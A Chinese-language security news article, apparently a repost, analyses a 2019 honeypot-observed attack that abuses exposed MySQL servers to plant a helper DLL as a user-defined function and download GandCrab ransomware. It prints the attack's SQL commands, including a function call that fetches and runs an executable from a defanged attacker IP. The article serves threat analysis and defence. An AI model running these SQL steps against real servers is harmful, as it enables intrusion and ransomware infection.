欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

攻击MySQL服务器传播GandCrab勒索软件

来源:本站整理 作者:佚名 时间:2019-05-29 TAG: 我要投稿

研究人员在实验室环境中搭建了一个蜜罐系统,监听着SQL服务器使用的默认端口(TCP/3306端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为,发现该Linux蜜罐下载了一个Windows可执行文件。

攻击者首先用SQL数据库命令在上传helper DLL到服务器,然后作为数据库函数调用该DLL来提取IP地址位于加拿大魁北克省的主机上的GandCrab payload。

数据库服务器下载GandCrab
SQL攻击
攻击的第一阶段是攻击者连接到数据库服务器,然后确定他运行的是MySQL。因为蜜罐系统模拟了MySQL,因此攻击的后面部分就非常顺利。

攻击者释放的SQL命令
然后,攻击者使用set命令来上传所有的字节,这些字节组成了helper DLL,这些字节是长字符串格式的十六进制字符,在内存中会作为变量。

helper DLL作为输出进入数据库,就像真的长记录一样
然后攻击者将变量的内容写入创建的数据库表yongger2中。
然后攻击者发布命令给服务器将这些字节拼接成一个文件,然后释放到服务器的插件目录中。研究人员还发现许多用于交换斜杠和反斜杠字符的命令,目的是绕过安全特征。

Helper DLL的内部功能
DLL看似会向数据库增加3个函数,分别是xpdl3, xpdl3_deinit, xpdl3_init。DLL只是许多恶意工具箱的一个组件,之前就被上传到VirusTotal这样的平台上。

helper DLL包含在许多含有恶意工具集的文档中
攻击者会发布SQL命令来释放yongger2 table,删除通过服务器的文件轨迹记录,释放函数xpdl3。最后,使用下面的SQL命令来创建新的数据库函数xpdl3来调用该DLL:
CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
将helper DLL传到数据库服务器的插件目录并初始化后,攻击者就会发布SQL命令道服务器中,调用新添加的xpdl3函数:
select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Wireshark中发现的网络事件序列
如果一切正常,数据库服务器就会从远程机器下载GandCrab payload,并释放到C盘根目录,命名为isetup.exe并执行。
这种攻击很流行
针对数据库服务器的攻击并不少见,而且这个趋势未来可能会继续。就在5月19日这个攻击就发生在真实的MySQL服务器上,机器应该已经被加密。

开放目录使用HFS,含有中文用户接口
但是文件所在的URL指向的是位于web服务器的开放目录,web服务器运行的是HFS服务器软件,这是一个基于Windows的web服务器
但保存GandCrab样本的机器的IP地址的位置为美国的亚利桑那州,但机器安装的HFS用户接口是简体中文。而且显示有人多次下载了服务器上的文件。
开放目录显示有5个以3306开头的Windows可执行文件,之后是连字符-,实际上是同一文件的多个重命名版本。只有3306.exe文件与其余的不同。目录中还含有名为RDP的恶意Linux ELF可执行文件,但是本次攻击活动中没有使用。

RDP文件是相关的DDOS Linux木马的样本之一
服务器显示样本3306-1.exe的下载量超过500次。所有样本加起来5天下载了接近800,开放目录中的GandCrab样本下载量超过2300次。
虽然目前还没有大规模攻击和广泛传播,但是确实对MySQL服务器管理员带来了巨大的威胁,因为3306端口会成为攻击者的一个跳板。
 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载